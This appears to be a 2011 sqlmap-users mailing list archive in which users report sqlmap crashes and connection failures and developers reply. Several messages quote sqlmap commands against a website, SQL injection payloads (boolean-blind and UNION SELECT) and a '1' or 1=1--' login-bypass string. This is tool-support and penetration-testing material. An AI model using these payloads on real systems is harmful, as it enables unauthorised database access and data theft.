'oBcE'='oBcE&p=48693 >> >> Type: UNION query >> Title: MySQL UNION query (NULL) - 1 to 10 columns >> Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, >> CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106 >> ,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND >> 'sOCX'='sOCX&p=48693 >> --- >> >> [04:52:32] [INFO] manual usage of GET payloads requires url encoding >> [04:52:32] [INFO] the back-end DBMS is MySQL >> >> web application technology: PHP 4.4.0, Apache 1.3.33 >> back-end DBMS: MySQL 4 >> [04:52:32] [INFO] checking table existence using items from >> 'C:\pentest\p\sqlmap.0.9-1\txt\comm >> on-tables.txt' >> [04:52:32] [INFO] adding words used on web page to the check list >> please enter number of threads? [Enter for 1 (current)] 3 >> [04:52:40] [WARNING] if the problem persists with 'None' values please try >> to use hidden switch --no-cast (fix >> ing problems with some collation issues) >> [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection >> timed out to the target url or prox >> y, sqlmap is going to retry the request >> [04:53:24] [WARNING] if the problem persists please try to lower the number >> of used threads (--threads) >> [04:53:38] [INFO] tried 88/3452 items (3%) >> [04:53:39] [WARNING] user aborted during common table existence check. >> sqlmap will display some tables only >> Exception in thread 1: >> Traceback (most recent call last): >> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner >> self.run() >> File "C:\Python27\lib\threading.py", line 485, in run >> self.__target(*self.__args, **self.__kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in >> tableExistsThread >> result = inject.checkBooleanExpression("%s" % >> safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), >> fullTableName))) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in >> checkBooleanExpression >> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, >> suppressOutput=True, expectingNon >> e=expectingNone) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in >> getValue >> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, >> unpack, dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in >> __goInband >> output = unionUse(expression, unpack=unpack, dump=dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 354, in unionUse >> value = __oneShotUnionUse(expression, unpack) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 72, in __oneShotUni >> onUse >> page, headers = Request.queryPage(payload, content=True, raise404=False) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in >> queryPage >> page, headers = Connect.getPage(url=uri, get=get, post=post, >> cookie=cookie, ua=ua, referer=referer, silent >> =silent, method=method, auxHeaders=auxHeaders, response=response, >> raise404=raise404, ignoreTimeout=timeBasedCo >> mpare) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in >> getPage >> raise sqlmapConnectionException, warnMsg >> sqlmapConnectionException: unable to connect to the target url or proxy >> >> Exception in thread 2: >> Traceback (most recent call last): >> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner >> self.run() >> File "C:\Python27\lib\threading.py", line 485, in run >> self.__target(*self.__args, **self.__kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in >> tableExistsThread >> result = inject.checkBooleanExpression("%s" % >> safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), >> fullTableName))) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in >> checkBooleanExpression >> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, >> suppressOutput=True, expectingNon >> e=expectingNone) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in >> getValue >> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, >> unpack, dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in >> __goInband >> output = unionUse(expression, unpack=unpack, dump=dump) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 354, in unionUse >> value = __oneShotUnionUse(expression, unpack) >> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line >> 72, in __oneShotUni >> onUse >> page, headers = Request.queryPage(payload, content=True, raise404=False) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in >> queryPage >> page, headers = Connect.getPage(url=uri, get=get, post=post, >> cookie=cookie, ua=ua, referer=referer, silent >> =silent, method=method, auxHeaders=auxHeaders, response=response, >> raise404=raise404, ignoreTimeout=timeBasedCo >> mpare) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in >> getPage >> return Connect.__getPageProxy(**kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in >> __getPageProxy >> return Connect.getPage(**kwargs) >> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in >> getPage >> raise sqlmapConnectionException, warnMsg >> sqlmapConnectionException: connection timed out to the target url or proxy >> >> >> [04:53:55] [WARNING] no table(s) found >> tables: '{}' >> >> [04:53:55] [INFO] Fetched data logged to text files under >> 'C:\pentest\p\sqlmap.0.9-1\output\ >> >> [*] shutting down at: 04:53:55 >> >> ------------------------------------------------------------------------------ >> EditLive Enterprise is the world's most technically advanced content >> authoring tool. Experience the power of Track Changes, Inline Image >> Editing and ensure content is compliant with Accessibility Checking. >> http://p.sf.net/sfu/ephox-dev2dev >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 06:00:15
|
hi nightman. well, it's not really a bug: "[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)" i know that you've already used low number of threads (3) but it seems that you have some connection issues with your host. so, i am not sure how we could help :) kr On Tue, Jun 7, 2011 at 5:21 AM, <nig...@em...> wrote: > This Bug is from my laptops sqlmap with python 2.7 The other problem is on > another PC with still python 2.6 ;) > > sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent > --retries=6 --level 5 --risk 3 --common-tables -D Database > > Place: GET > Parameter: s > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693 > > Type: UNION query > Title: MySQL UNION query (NULL) - 1 to 10 columns > Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, > CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106 > ,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND > 'sOCX'='sOCX&p=48693 > --- > > [04:52:32] [INFO] manual usage of GET payloads requires url encoding > [04:52:32] [INFO] the back-end DBMS is MySQL > > web application technology: PHP 4.4.0, Apache 1.3.33 > back-end DBMS: MySQL 4 > [04:52:32] [INFO] checking table existence using items from > 'C:\pentest\p\sqlmap.0.9-1\txt\comm > on-tables.txt' > [04:52:32] [INFO] adding words used on web page to the check list > please enter number of threads? [Enter for 1 (current)] 3 > [04:52:40] [WARNING] if the problem persists with 'None' values please try > to use hidden switch --no-cast (fix > ing problems with some collation issues) > [04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection > timed out to the target url or prox > y, sqlmap is going to retry the request > [04:53:24] [WARNING] if the problem persists please try to lower the number > of used threads (--threads) > [04:53:38] [INFO] tried 88/3452 items (3%) > [04:53:39] [WARNING] user aborted during common table existence check. > sqlmap will display some tables only > Exception in thread 1: > Traceback (most recent call last): > File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner > self.run() > File "C:\Python27\lib\threading.py", line 485, in run > self.__target(*self.__args, **self.__kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in > tableExistsThread > result = inject.checkBooleanExpression("%s" % > safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), > fullTableName))) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in > checkBooleanExpression > value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, > suppressOutput=True, expectingNon > e=expectingNone) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in > getValue > value = __goInband(forgeCaseExpression, expected, sort, resumeValue, > unpack, dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 354, in unionUse > value = __oneShotUnionUse(expression, unpack) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 72, in __oneShotUni > onUse > page, headers = Request.queryPage(payload, content=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent > =silent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCo > mpare) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in > getPage > raise sqlmapConnectionException, warnMsg > sqlmapConnectionException: unable to connect to the target url or proxy > > Exception in thread 2: > Traceback (most recent call last): > File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner > self.run() > File "C:\Python27\lib\threading.py", line 485, in run > self.__target(*self.__args, **self.__kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in > tableExistsThread > result = inject.checkBooleanExpression("%s" % > safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1), > fullTableName))) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in > checkBooleanExpression > value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, > suppressOutput=True, expectingNon > e=expectingNone) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in > getValue > value = __goInband(forgeCaseExpression, expected, sort, resumeValue, > unpack, dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in > __goInband > output = unionUse(expression, unpack=unpack, dump=dump) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 354, in unionUse > value = __oneShotUnionUse(expression, unpack) > File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line > 72, in __oneShotUni > onUse > page, headers = Request.queryPage(payload, content=True, raise404=False) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in > queryPage > page, headers = Connect.getPage(url=uri, get=get, post=post, > cookie=cookie, ua=ua, referer=referer, silent > =silent, method=method, auxHeaders=auxHeaders, response=response, > raise404=raise404, ignoreTimeout=timeBasedCo > mpare) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in > getPage > return Connect.__getPageProxy(**kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in > __getPageProxy > return Connect.getPage(**kwargs) > File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in > getPage > raise sqlmapConnectionException, warnMsg > sqlmapConnectionException: connection timed out to the target url or proxy > > > [04:53:55] [WARNING] no table(s) found > tables: '{}' > > [04:53:55] [INFO] Fetched data logged to text files under > 'C:\pentest\p\sqlmap.0.9-1\output\ > > [*] shutting down at: 04:53:55 > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: Miroslav S. <mir...@gm...> - 2011-06-07 05:54:59
|
hi Kirill. Thank you for your report and find it fixed in the last commit. Kr On Tue, Jun 7, 2011 at 12:47 AM, Kirill Morozov <l0...@l0...> wrote: > > [02:45:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4027), retry > your run with the latest development version from the Subversion repository. > If the exception persists, please send by e-mail to > sql...@li... the following text and any information > required to reproduce the bug. The developers will try to reproduce the bug, > fix it accordingly and get back to you. > sqlmap version: 1.0-dev (r4027) > Python version: 2.6.5 > Operating system: posix > Command line: ./sqlmap.py -m target.txt --random-agent --batch > Technique: None > Back-end DBMS: Microsoft Access (identified) > Traceback (most recent call last): > File "./sqlmap.py", line 86, in main > start() > File "/root/sqlmap-dev/lib/controller/controller.py", line 424, in start > elif not checkDynParam(place, parameter, value): > File "/root/sqlmap-dev/lib/controller/checks.py", line 642, in > checkDynParam > dynResult = Request.queryPage(payload, place, raise404=False) > File "/root/sqlmap-dev/lib/request/connect.py", line 608, in queryPage > return comparison(page, getRatioValue, pageLength) > File "/root/sqlmap-dev/lib/request/comparison.py", line 77, in comparison > seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or > DEFAULT_PAGE_ENCODING) > UnicodeEncodeError: 'latin-1' codec can't encode character u'\u2019' in > position 28004: ordinal not in range(256) > -- > Kirill Morozov > KIMO2-RIPE, RHCE > > > > ------------------------------------------------------------------------------ > EditLive Enterprise is the world's most technically advanced content > authoring tool. Experience the power of Track Changes, Inline Image > Editing and ensure content is compliant with Accessibility Checking. > http://p.sf.net/sfu/ephox-dev2dev > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar E-mail: miroslav.stampar (at) gmail.com PGP Key ID: 0xB5397B1B |
|
From: <nig...@em...> - 2011-06-07 03:21:09
|
<html><head></head><body bgcolor='#FFFFFF' style='font-size:12px;background-color:#FFFFFF;font-family:Verdana, Arial, sans-serif;'>This Bug is from my laptops sqlmap with python 2.7 The other problem is on another PC with still python 2.6 ;)<br/><br/>sqlmap -u "http://website.com/feed.php?s=os&p=48693" --random-agent --retries=6 --level 5 --risk 3 --common-tables -D Database<br/><br/>Place: GET<br/>Parameter: s<br/> Type: boolean-based blind<br/> Title: AND boolean-based blind - WHERE or HAVING clause<br/> Payload: s=os' AND 611=611 AND 'oBcE'='oBcE&p=48693<br/><br/> Type: UNION query<br/> Title: MySQL UNION query (NULL) - 1 to 10 columns<br/> Payload: s=os' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,99,112,106,58),CHAR(108,106,75,100,77,106<br/>,84,75,97,86),CHAR(58,119,106,120,58)), NULL, NULL, NULL# AND 'sOCX'='sOCX&p=48693<br/>---<br/><br/>[04:52:32] [INFO] manual usage of GET payloads requires url encoding<br/>[04:52:32] [INFO] the back-end DBMS is MySQL<br/><br/>web application technology: PHP 4.4.0, Apache 1.3.33<br/>back-end DBMS: MySQL 4<br/>[04:52:32] [INFO] checking table existence using items from 'C:\pentest\p\sqlmap.0.9-1\txt\comm<br/>on-tables.txt'<br/>[04:52:32] [INFO] adding words used on web page to the check list<br/>please enter number of threads? [Enter for 1 (current)] 3<br/>[04:52:40] [WARNING] if the problem persists with 'None' values please try to use hidden switch --no-cast (fix<br/>ing problems with some collation issues)<br/>[04:53:23] [INFO] tried 74/3452 items (2%)[04:53:24] [CRITICAL] connection timed out to the target url or prox<br/>y, sqlmap is going to retry the request<br/>[04:53:24] [WARNING] if the problem persists please try to lower the number of used threads (--threads)<br/>[04:53:38] [INFO] tried 88/3452 items (3%)<br/>[04:53:39] [WARNING] user aborted during common table existence check. sqlmap will display some tables only<br/>Exception in thread 1:<br/>Traceback (most recent call last):<br/> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner<br/> self.run()<br/> File "C:\Python27\lib\threading.py", line 485, in run<br/> self.__target(*self.__args, **self.__kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread<br/> result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1),<br/> fullTableName)))<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression<br/> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon<br/>e=expectingNone)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue<br/> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband<br/> output = unionUse(expression, unpack=unpack, dump=dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse<br/> value = __oneShotUnionUse(expression, unpack)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUni<br/>onUse<br/> page, headers = Request.queryPage(payload, content=True, raise404=False)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage<br/> page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent<br/>=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo<br/>mpare)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage<br/> raise sqlmapConnectionException, warnMsg<br/>sqlmapConnectionException: unable to connect to the target url or proxy<br/><br/>Exception in thread 2:<br/>Traceback (most recent call last):<br/> File "C:\Python27\lib\threading.py", line 532, in __bootstrap_inner<br/> self.run()<br/> File "C:\Python27\lib\threading.py", line 485, in run<br/> self.__target(*self.__args, **self.__kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\brute\use.py", line 76, in tableExistsThread<br/> result = inject.checkBooleanExpression("%s" % safeStringFormat("EXISTS(SELECT %d FROM %s)", (randomInt(1),<br/> fullTableName)))<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 519, in checkBooleanExpression<br/> value = getValue(unescaper.unescape(expression), expected=EXPECTED.BOOL, suppressOutput=True, expectingNon<br/>e=expectingNone)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 432, in getValue<br/> value = __goInband(forgeCaseExpression, expected, sort, resumeValue, unpack, dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\inject.py", line 386, in __goInband<br/> output = unionUse(expression, unpack=unpack, dump=dump)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 354, in unionUse<br/> value = __oneShotUnionUse(expression, unpack)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\techniques\inband\union\use.py", line 72, in __oneShotUni<br/>onUse<br/> page, headers = Request.queryPage(payload, content=True, raise404=False)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 585, in queryPage<br/> page, headers = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, silent<br/>=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCo<br/>mpare)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 433, in getPage<br/> return Connect.__getPageProxy(**kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 73, in __getPageProxy<br/> return Connect.getPage(**kwargs)<br/> File "C:\pentest\p\sqlmap.0.9-1\lib\request\connect.py", line 439, in getPage<br/> raise sqlmapConnectionException, warnMsg<br/>sqlmapConnectionException: connection timed out to the target url or proxy<br/><br/><br/>[04:53:55] [WARNING] no table(s) found<br/>tables: '{}'<br/><br/>[04:53:55] [INFO] Fetched data logged to text files under 'C:\pentest\p\sqlmap.0.9-1\output\<br/><br/>[*] shutting down at: 04:53:55<br/></body></html> |
|
From: Bernardo D. A. G. <ber...@gm...> - 2011-06-06 23:26:42
|
Matt, About your point a), sqlmap did not identify the or based Boolean based injection because these are not tested at detection phase by default. You need to increase --risk 3 and --level value to appropriate one. Please, refer to the users manual for further details. There two switches are mandatory to understand in order to take the best out of sqlmap. Bernardo Damele A. G. This message was sent from a smartphone On 6 Jun 2011, at 11:21, Miroslav Stampar <mir...@gm...> wrote: > appendix: > > "When I get in, I can't extract data. I can get verification that I'm > a DBA, but little to nothing else" > and > "why I would get no data returned?" > > for all of you who experience these symptoms here and there, there are > two possibilities: > a) there is something actually wrong with sqlmap and please refer to > the last mail what to do to help us out > b) queries are filtered by some kind of WAF (e.g. @@version works but > everything else fails) > > kr > > > On Mon, Jun 6, 2011 at 12:11 PM, Miroslav Stampar > <mir...@gm...> wrote: >> hi Matt >> >> On Sat, Jun 4, 2011 at 10:47 PM, Matt Gardenghi <mtg...@gm...> wrote: >>> Hello, >>> >>> I've been testing a non-production app from a black-box perspective. The >>> only SQLi I've found is from the login page. I can bypass the login by >>> dropping something like: 1' or 1=1-- into the password field. >>> Unfortunately, sqlmap doesn't find this vulnerability. Well, that's not >>> quite true. I eventually, dumped my Burp proxy log into a file and had >>> sqlmap target it. The POST file is icky (IIS7.5 ASP and tons of weird data >>> running around). Still after repeated tests, sqlmap eventually found this >>> vulnerability as a time based SQLi. >>> >>> I don't understand why sqlmap cannot locate the vulnerability via the >>> stacked query or simply that it bypasses the login page. When I get in, I >>> can't extract data. I can get verification that I'm a DBA, but little to >>> nothing else. With --sql-shell, I can run 'SELECT @@version' and sqlmap >>> returns a blank data set; if the query is bogus, it returns an error. So, >>> for some reason, no data is returned. >>> Would anyone be able to give me some pointers on a) why sqlmap doesn't see >>> this injection properly, and b) why I would get no data returned? >> >> no problem. >> >> in this kind of situations rule of thumb goes like this: >> 1) try to exploit it manually >> 2) if you succeed in 1) then please report back and we'll be more than >> happy to make a fix >> 3) if you don't succeed with 1) then please collect as much data as >> you can with -v 3 and -t traffic.txt, inspect it yourself and try to >> find something that could explain the faulty sqlmap's behavior >> 4) if you are not very skillful with 2) or 3) you can always send some >> more data (traffic.txt, debug output of -v 3, target url) privately >> via email >> >> kr >> >> p.s. personally, i admire people that do 1) and 2) by themself and report back. >> >>> Thanks, >>> >>> -- >>> Matt Gardenghi >>> >>> ------------------------------------------------------------------------------ >>> Simplify data backup and recovery for your virtual environment with vRanger. >>> Installation's a snap, and flexible recovery options mean your data is safe, >>> secure and there when you need it. Discover what all the cheering's about. >>> Get your free trial download today. >>> http://p.sf.net/sfu/quest-dev2dev2 >>> _______________________________________________ >>> sqlmap-users mailing list >>> sql...@li... >>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >>> >>> >> >> >> >> -- >> Miroslav Stampar >> >> E-mail: miroslav.stampar (at) gmail.com >> PGP Key ID: 0xB5397B1B >> > > > > -- > Miroslav Stampar > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > > ------------------------------------------------------------------------------ > Simplify data backup and recovery for your virtual environment with vRanger. > Installation's a snap, and flexible recovery options mean your data is safe, > secure and there when you need it. Discover what all the cheering's about. > Get your free trial download today. > http://p.sf.net/sfu/quest-dev2dev2 > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
48 messages has been excluded from this view by a project administrator.
